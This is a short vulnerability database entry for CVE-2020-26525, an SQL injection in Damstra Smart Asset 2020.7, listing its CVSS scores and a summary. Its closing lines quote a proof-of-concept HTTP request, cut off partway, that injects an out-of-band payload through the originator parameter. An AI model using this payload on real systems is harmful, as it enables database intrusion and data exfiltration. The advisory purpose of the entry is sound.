6.4
CVSSv2

CVE-2020-26525

Published: 02/10/2020 Updated: 06/10/2020
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
CVSS v3 Base Score: 9.1 | Impact Score: 5.2 | Exploitability Score: 3.9
VMScore: 570
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter. This allows forcing the database and server to initiate remote connections to third party DNS servers.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

damstratechnology smart asset 2020.7

Github Repositories

Damstra Smart Asset 2020.7 has SQL injection via the API/api/Asset originator parameter.

SmartAsset-SQLinj-CVE-2020-26525 Damstra Smart Asset 20207 has SQL injection via the API/api/Asset originator parameter Smart Asset - version 20207 CVE-2020-26525 ========================== HTTP Request: GET /API/api/Asset?assetCode=XXX-08-X-01-06-01& originator=FIRSTNAMELASTNAME'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c<>%5cqoe